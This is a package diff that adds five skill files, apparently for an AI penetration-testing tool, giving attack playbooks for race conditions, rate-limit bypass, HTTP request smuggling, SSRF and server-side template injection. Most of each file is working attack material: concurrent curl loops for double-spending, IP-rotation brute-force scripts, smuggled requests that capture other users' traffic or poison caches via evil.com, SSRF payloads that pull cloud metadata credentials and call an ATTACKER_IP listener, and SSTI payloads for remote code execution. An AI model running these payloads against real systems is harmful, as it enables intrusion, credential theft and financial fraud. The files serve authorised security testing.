@cyberstrike-io/cyberstrike 1.1.13 → 1.1.14

package/skill/attack-race-condition/SKILL.md

@@ -0,0 +1,125 @@
+---
+name: attack-race-condition
+description: "Race condition / TOCTOU testing — concurrent requests to exploit time-of-check-to-time-of-use flaws"
+category: "web-application"
+version: "1.0"
+author: "cyberstrike-official"
+tags:
+  - race-condition
+  - toctou
+  - web
+  - business-logic
+  - attack
+tech_stack:
+  - web
+cwe_ids:
+  - CWE-362
+  - CWE-367
+chains_with: []
+prerequisites: []
+severity_boost: {}
+---
+
+# Race Condition / TOCTOU Attack
+
+## Objective
+
+Exploit time-of-check-to-time-of-use (TOCTOU) vulnerabilities by sending concurrent requests that bypass server-side validation.
+
+## Testing Methodology
+
+### Phase 1: Identify Targets
+
+State-changing operations vulnerable to race conditions:
+- Coupon/promo code redemption
+- Fund transfers / payments
+- Vote/like systems
+- Account creation (duplicate)
+- Inventory purchase
+- Password/email change
+- File operations
+
+### Phase 2: Automated Race Testing
+
+```bash
+# Basic race test — 20 concurrent POST requests
+attack_script race_tester "https://TARGET/api/redeem" \
+  -m POST \
+  -H "Authorization:Bearer TOKEN" \
+  -d '{"coupon":"DISCOUNT50"}' \
+  -c 20 \
+  --json-output
+
+# With delay (staggered)
+attack_script race_tester "https://TARGET/api/transfer" \
+  -m POST \
+  -H "Authorization:Bearer TOKEN" \
+  -d '{"to":"attacker","amount":100}' \
+  -c 50 \
+  --delay 5
+```
+
+### Phase 3: Single-Packet Attack (Turbo Intruder)
+
+For critical timing, send all requests in a single TCP packet:
+
+```bash
+# Using curl with parallel connections
+for i in $(seq 1 20); do
+  curl -s -X POST https://TARGET/api/redeem \
+    -H "Authorization: Bearer TOKEN" \
+    -d '{"coupon":"DISCOUNT50"}' &
+done
+wait
+```
+
+### Phase 4: Analysis
+
+Look for:
+- Multiple successful responses (coupon applied 2+ times)
+- Balance inconsistencies
+- Duplicate records created
+- Response length/status variations indicating multiple successes
+
+### Phase 5: Limit Bypass Race
+
+```bash
+# Race on rate-limited endpoint
+attack_script race_tester "https://TARGET/api/login" \
+  -m POST \
+  -d '{"email":"victim@test.com","password":"guess1"}' \
+  -c 30
+
+# Race on one-time action
+attack_script race_tester "https://TARGET/api/claim-bonus" \
+  -m POST \
+  -H "Authorization:Bearer TOKEN" \
+  -c 20
+```
+
+## What Constitutes a Finding
+
+| Finding | Severity |
+|---------|----------|
+| Financial: double-spend, duplicate transfer | Critical (P1) |
+| Coupon/code reused multiple times | High (P2) |
+| Rate limit bypassed via race | Medium (P3) |
+| Duplicate record creation | Medium (P3) |
+| Vote/like manipulation | Low (P4) |
+
+## Evidence Requirements
+
+- Target endpoint and parameters
+- Number of concurrent requests
+- Multiple successful responses proving race succeeded
+- Business impact (e.g., coupon applied twice, balance doubled)
+- Status code distribution from race test
+
+## Tools
+
+- `attack_script race_tester` — async concurrent request sender
+
+## References
+
+- [PortSwigger: Race Conditions](https://portswigger.net/web-security/race-conditions)
+- [James Kettle: Smashing the State Machine](https://portswigger.net/research/smashing-the-state-machine)

package/skill/attack-rate-limit-bypass/SKILL.md

@@ -0,0 +1,146 @@
+---
+name: attack-rate-limit-bypass
+description: "Rate limit bypass testing — XFF rotation, case variation, method switching, header manipulation"
+category: "web-application"
+version: "1.0"
+author: "cyberstrike-official"
+tags:
+  - rate-limit
+  - brute-force
+  - web
+  - bypass
+  - attack
+tech_stack:
+  - web
+cwe_ids:
+  - CWE-307
+  - CWE-770
+chains_with:
+  - attack-race-condition
+prerequisites: []
+severity_boost:
+  attack-race-condition: "Rate limit bypass + race condition = unlimited exploitation"
+---
+
+# Rate Limit Bypass
+
+## Objective
+
+Bypass rate limiting mechanisms to enable brute-force attacks, credential stuffing, or abuse of rate-limited functionality.
+
+## Testing Methodology
+
+### Phase 1: Automated Bypass Testing
+
+```bash
+# Full bypass test suite (5 techniques)
+attack_script rate_limit_bypass "https://TARGET/api/login" \
+  --method POST \
+  -H "Content-Type:application/json" \
+  -d '{"email":"test@test.com","password":"test"}' \
+  --count 20 \
+  --json-output
+```
+
+Tests automatically:
+1. X-Forwarded-For IP rotation
+2. URL case variation
+3. HTTP method switching
+4. Random query parameter injection
+5. Header-based bypasses
+
+### Phase 2: X-Forwarded-For Rotation
+
+```bash
+# Rotate source IP via headers
+for i in $(seq 1 50); do
+  IP="$((RANDOM%254+1)).$((RANDOM%254+1)).$((RANDOM%254+1)).$((RANDOM%254+1))"
+  curl -s -o /dev/null -w "%{http_code} " \
+    -X POST https://TARGET/api/login \
+    -H "X-Forwarded-For: $IP" \
+    -H "X-Real-IP: $IP" \
+    -H "X-Client-IP: $IP" \
+    -d '{"email":"test@test.com","password":"guess"}'
+done
+```
+
+### Phase 3: URL Manipulation
+
+```bash
+# Path case variation
+curl https://TARGET/API/LOGIN
+curl https://TARGET/Api/Login
+
+# Trailing slash/dot
+curl https://TARGET/api/login/
+curl https://TARGET/api/login/.
+
+# Double slash
+curl https://TARGET//api//login
+
+# Random query params (new cache key)
+curl "https://TARGET/api/login?_=$(date +%s)"
+```
+
+### Phase 4: Header Bypasses
+
+```bash
+curl -X POST https://TARGET/api/login \
+  -H "X-Forwarded-For: 127.0.0.1"
+
+curl -X POST https://TARGET/api/login \
+  -H "X-Forwarded-Host: localhost"
+
+curl -X POST https://TARGET/api/login \
+  -H "X-Original-URL: /api/login"
+
+curl -X POST https://TARGET/api/login \
+  -H "X-Custom-IP-Authorization: 127.0.0.1"
+```
+
+### Phase 5: Account Lockout Bypass
+
+```bash
+# Distribute across usernames
+for user in user1 user2 user3; do
+  curl -X POST https://TARGET/api/login \
+    -d "{\"email\":\"$user@test.com\",\"password\":\"common_password\"}"
+done
+
+# IP rotation + distributed usernames = bypass
+```
+
+### Phase 6: WAF Bypass + Rate Limit
+
+```bash
+# Encode payloads to avoid WAF detection
+attack_script waf_bypass "admin' OR 1=1--" --test-url "https://TARGET/api/login" --param password
+```
+
+## What Constitutes a Finding
+
+| Finding | Severity |
+|---------|----------|
+| Rate limit bypass on login/auth endpoint | High (P2) |
+| Rate limit bypass on password reset | High (P2) |
+| Rate limit bypass on OTP/2FA verification | Critical (P1) |
+| Rate limit bypass on financial operations | Critical (P1) |
+| Rate limit bypass on non-sensitive endpoint | Low (P4) |
+
+## Evidence Requirements
+
+- Endpoint tested
+- Normal rate limit behavior (429 after N requests)
+- Bypass technique used
+- Successful requests beyond the limit
+- Count of requests that bypassed the limit
+
+## Tools
+
+- `attack_script rate_limit_bypass` — automated 5-technique bypass testing
+- `attack_script waf_bypass` — encoding variants for WAF bypass
+
+## References
+
+- [OWASP: Rate Limiting](https://owasp.org/www-community/controls/Rate_Limiting)
+- [HackerOne: Rate Limit Bypass](https://www.hackerone.com/vulnerability-management/rate-limiting-bypass-techniques)

package/skill/attack-request-smuggling/SKILL.md

@@ -0,0 +1,164 @@
+---
+name: attack-request-smuggling
+description: "HTTP request smuggling — CL.TE, TE.CL, TE.TE desync attacks for cache poisoning and auth bypass"
+category: "web-application"
+version: "1.0"
+author: "cyberstrike-official"
+tags:
+  - request-smuggling
+  - http-desync
+  - web
+  - attack
+tech_stack:
+  - web
+cwe_ids:
+  - CWE-444
+chains_with:
+  - attack-cache-poison
+  - attack-open-redirect
+prerequisites: []
+severity_boost:
+  attack-cache-poison: "Smuggling + cache = stored XSS/redirect for all users"
+---
+
+# HTTP Request Smuggling
+
+## Objective
+
+Exploit disagreements between front-end and back-end servers on request boundary parsing (Content-Length vs Transfer-Encoding) to smuggle a second request.
+
+## Testing Methodology
+
+### Phase 1: Detect Smuggling
+
+**CL.TE (front uses Content-Length, back uses Transfer-Encoding):**
+
+```http
+POST / HTTP/1.1
+Host: TARGET
+Content-Length: 13
+Transfer-Encoding: chunked
+
+0
+
+SMUGGLED
+```
+
+**TE.CL (front uses Transfer-Encoding, back uses Content-Length):**
+
+```http
+POST / HTTP/1.1
+Host: TARGET
+Content-Length: 3
+Transfer-Encoding: chunked
+
+8
+SMUGGLED
+0
+
+```
+
+### Phase 2: Timing-Based Detection
+
+Send ambiguous request, measure response time:
+- If back-end times out waiting for more data → smuggling may be possible
+
+```bash
+# CL.TE detection (timeout = vulnerable)
+printf 'POST / HTTP/1.1\r\nHost: TARGET\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nA\r\nX' | timeout 10 nc TARGET 80
+```
+
+### Phase 3: Confirm Smuggling
+
+**CL.TE confirmed:**
+
+```http
+POST / HTTP/1.1
+Host: TARGET
+Content-Length: 35
+Transfer-Encoding: chunked
+
+0
+
+GET /404-proof HTTP/1.1
+X: x
+```
+
+If next request to `/` returns 404 or different page, smuggling is confirmed.
+
+### Phase 4: Exploitation
+
+**Capture other user's request:**
+```http
+POST / HTTP/1.1
+Host: TARGET
+Content-Length: 100
+Transfer-Encoding: chunked
+
+0
+
+POST /log HTTP/1.1
+Content-Length: 10000
+Content-Type: application/x-www-form-urlencoded
+
+data=
+```
+Next user's request is appended to `data=` parameter.
+
+**Bypass front-end access controls:**
+```http
+POST / HTTP/1.1
+Host: TARGET
+Content-Length: 50
+Transfer-Encoding: chunked
+
+0
+
+GET /admin HTTP/1.1
+Host: TARGET
+X: x
+```
+
+**Cache poisoning via smuggling:**
+```http
+POST / HTTP/1.1
+Host: TARGET
+Content-Length: 100
+Transfer-Encoding: chunked
+
+0
+
+GET /static/main.js HTTP/1.1
+Host: evil.com
+X: x
+```
+
+### Phase 5: H2.CL / H2 Smuggling
+
+```bash
+# HTTP/2 downgrade smuggling
+curl --http2 https://TARGET/ \
+  -H "Content-Length: 0" \
+  -H "Transfer-Encoding: chunked" \
+  -d "0\r\n\r\nGET /admin HTTP/1.1\r\nHost: TARGET\r\n\r\n"
+```
+
+## What Constitutes a Finding
+
+| Finding | Severity |
+|---------|----------|
+| Request smuggling → capture user requests | Critical (P1) |
+| Smuggling → admin access bypass | Critical (P1) |
+| Smuggling → cache poisoning | Critical (P1) |
+| CL.TE or TE.CL desync confirmed | High (P2) |
+
+## Evidence Requirements
+
+- Smuggling variant (CL.TE, TE.CL, TE.TE, H2.CL)
+- Proof of desync (wrong response, timing, captured request)
+- Impact demonstration (auth bypass, cache poison, request capture)
+
+## References
+
+- [PortSwigger: Request Smuggling](https://portswigger.net/web-security/request-smuggling)
+- [James Kettle: HTTP Desync Attacks](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn)

package/skill/attack-ssrf/SKILL.md

@@ -0,0 +1,132 @@
+---
+name: attack-ssrf
+description: "Server-Side Request Forgery — internal network access, cloud metadata theft, filter bypass techniques"
+category: "web-application"
+version: "1.0"
+author: "cyberstrike-official"
+tags:
+  - ssrf
+  - web
+  - injection
+  - cloud
+  - attack
+tech_stack:
+  - web
+  - aws
+  - gcp
+  - azure
+cwe_ids:
+  - CWE-918
+chains_with:
+  - attack-xxe
+  - attack-ssti
+prerequisites: []
+severity_boost:
+  attack-xxe: "SSRF via XXE parser = file read + internal network scanning"
+  attack-ssti: "SSRF from SSTI = full RCE chain"
+---
+
+# Server-Side Request Forgery (SSRF)
+
+## Objective
+
+Force the server to make requests to internal resources, cloud metadata endpoints, or attacker-controlled servers.
+
+## Testing Methodology
+
+### Phase 1: Identify URL Input Points
+
+Look for parameters that accept URLs:
+- Webhook URLs, callback URLs
+- File import/export (URL-based)
+- PDF/image generation from URL
+- URL preview/unfurling
+- Proxy/redirect endpoints
+
+### Phase 2: Basic SSRF Payloads
+
+```bash
+# Start callback listener
+attack_script ssrf_listener -p 8888 -o ssrf_evidence.json &
+
+# Test URL parameters
+curl "https://TARGET/api/fetch?url=http://ATTACKER_IP:8888/ssrf-test"
+curl "https://TARGET/api/preview?link=http://127.0.0.1:80"
+```
+
+### Phase 3: Cloud Metadata
+
+```bash
+# AWS IMDSv1
+curl "https://TARGET/fetch?url=http://169.254.169.254/latest/meta-data/"
+curl "https://TARGET/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
+
+# GCP
+curl "https://TARGET/fetch?url=http://metadata.google.internal/computeMetadata/v1/"
+
+# Azure
+curl "https://TARGET/fetch?url=http://169.254.169.254/metadata/instance?api-version=2021-02-01"
+```
+
+### Phase 4: Filter Bypass
+
+```bash
+# Decimal IP (127.0.0.1 = 2130706433)
+curl "https://TARGET/fetch?url=http://2130706433/"
+
+# Hex IP
+curl "https://TARGET/fetch?url=http://0x7f000001/"
+
+# IPv6
+curl "https://TARGET/fetch?url=http://[::1]/"
+
+# URL encoding
+curl "https://TARGET/fetch?url=http://%31%32%37%2e%30%2e%30%2e%31/"
+
+# DNS rebinding (use your own DNS server)
+curl "https://TARGET/fetch?url=http://rebind.127.0.0.1.nip.io/"
+
+# Redirect bypass
+curl "https://TARGET/fetch?url=http://ATTACKER/redirect?to=http://169.254.169.254/"
+
+# Protocol smuggling
+curl "https://TARGET/fetch?url=gopher://127.0.0.1:6379/_INFO"
+```
+
+### Phase 5: Internal Port Scanning
+
+```bash
+# Scan common internal ports
+for port in 80 443 8080 8443 3306 5432 6379 27017 9200 11211; do
+  curl -s -o /dev/null -w "%{http_code}" "https://TARGET/fetch?url=http://127.0.0.1:$port/" &
+done
+wait
+```
+
+## What Constitutes a Finding
+
+| Finding | Severity |
+|---------|----------|
+| Cloud metadata access (credentials) | Critical (P1) |
+| Internal network access | High (P2) |
+| Out-of-band HTTP callback | Medium (P3) |
+| Blind SSRF (timing-based) | Medium (P3) |
+| File read via file:// protocol | Critical (P1) |
+| gopher:// protocol access | High (P2) |
+
+## Evidence Requirements
+
+- URL parameter with SSRF payload
+- Response containing internal data or metadata
+- For blind SSRF: OOB callback evidence (use ssrf_listener)
+- Network topology information gathered
+
+## Tools
+
+- `attack_script ssrf_listener` — OOB callback listener
+- `curl` — manual SSRF testing
+
+## References
+
+- [PortSwigger: SSRF](https://portswigger.net/web-security/ssrf)
+- [OWASP: SSRF](https://owasp.org/www-community/attacks/Server_Side_Request_Forgery)

package/skill/attack-ssti/SKILL.md

@@ -0,0 +1,126 @@
+---
+name: attack-ssti
+description: "Server-Side Template Injection — detection, engine fingerprinting, and exploitation across 7 template engines"
+category: "web-application"
+version: "1.0"
+author: "cyberstrike-official"
+tags:
+  - ssti
+  - rce
+  - injection
+  - web
+  - attack
+tech_stack:
+  - web
+  - python
+  - java
+  - ruby
+  - php
+cwe_ids:
+  - CWE-94
+  - CWE-1336
+chains_with:
+  - attack-ssrf
+prerequisites: []
+severity_boost:
+  attack-ssrf: "SSTI → SSRF → internal service access = RCE chain"
+---
+
+# Server-Side Template Injection (SSTI)
+
+## Objective
+
+Detect and exploit server-side template injection to achieve code execution on the server.
+
+## Testing Methodology
+
+### Phase 1: Detection
+
+```bash
+# Automated SSTI detection across 7 engines
+attack_script ssti_tester "https://TARGET/search?q=FUZZ" --param q --json-output
+
+# Quick mode (math payloads only)
+attack_script ssti_tester "https://TARGET/render" --param template --quick
+```
+
+### Phase 2: Generic Detection Payloads
+
+Inject into every user-controlled parameter:
+
+```
+{{7*7}}           → 49 (Jinja2, Twig)
+${7*7}            → 49 (FreeMarker, Velocity, EL)
+<%= 7*7 %>        → 49 (ERB, JSP)
+#{7*7}            → 49 (Thymeleaf)
+{{7*'7'}}         → 7777777 (Jinja2 string multiplication)
+```
+
+### Phase 3: Engine Fingerprinting
+
+```
+{{config.items()}}                    → Jinja2 (Flask/Python)
+{{request.application.__globals__}}   → Jinja2
+${T(java.lang.Runtime)}               → Spring EL
+<#assign x=1>${x}                     → FreeMarker
+{{_self.env.getFilter('id')}}         → Twig (PHP)
+<%= system('id') %>                   → ERB (Ruby)
+```
+
+### Phase 4: Exploitation
+
+**Jinja2 (Python/Flask):**
+```
+{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
+{{''.__class__.__mro__[1].__subclasses__()[XXX]('id',shell=True,stdout=-1).communicate()}}
+```
+
+**FreeMarker (Java):**
+```
+${"freemarker.template.utility.Execute"?new()("id")}
+```
+
+**Twig (PHP):**
+```
+{{_self.env.registerUndefinedFilterCallback('system')}}{{_self.env.getFilter('id')}}
+```
+
+**ERB (Ruby):**
+```
+<%= `id` %>
+<%= system('id') %>
+```
+
+### Phase 5: POST-based Injection
+
+```bash
+# Test POST parameters
+attack_script ssti_tester "https://TARGET/api/render" --param content --method POST --data '{"content":"FUZZ"}'
+```
+
+## What Constitutes a Finding
+
+| Finding | Severity |
+|---------|----------|
+| Math expression evaluated (7*7=49) | High (P2) |
+| Config/env data leaked | High (P2) |
+| Command execution achieved | Critical (P1) |
+| File read via template | Critical (P1) |
+
+## Evidence Requirements
+
+- Injection point (parameter, endpoint)
+- Payload sent
+- Server response showing template evaluation
+- Template engine identified
+- For RCE: command output in response
+
+## Tools
+
+- `attack_script ssti_tester` — automated multi-engine detection
+- `tplmap` (external) — SSTI exploitation framework
+
+## References
+
+- [PortSwigger: SSTI](https://portswigger.net/research/server-side-template-injection)
+- [PayloadsAllTheThings: SSTI](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection)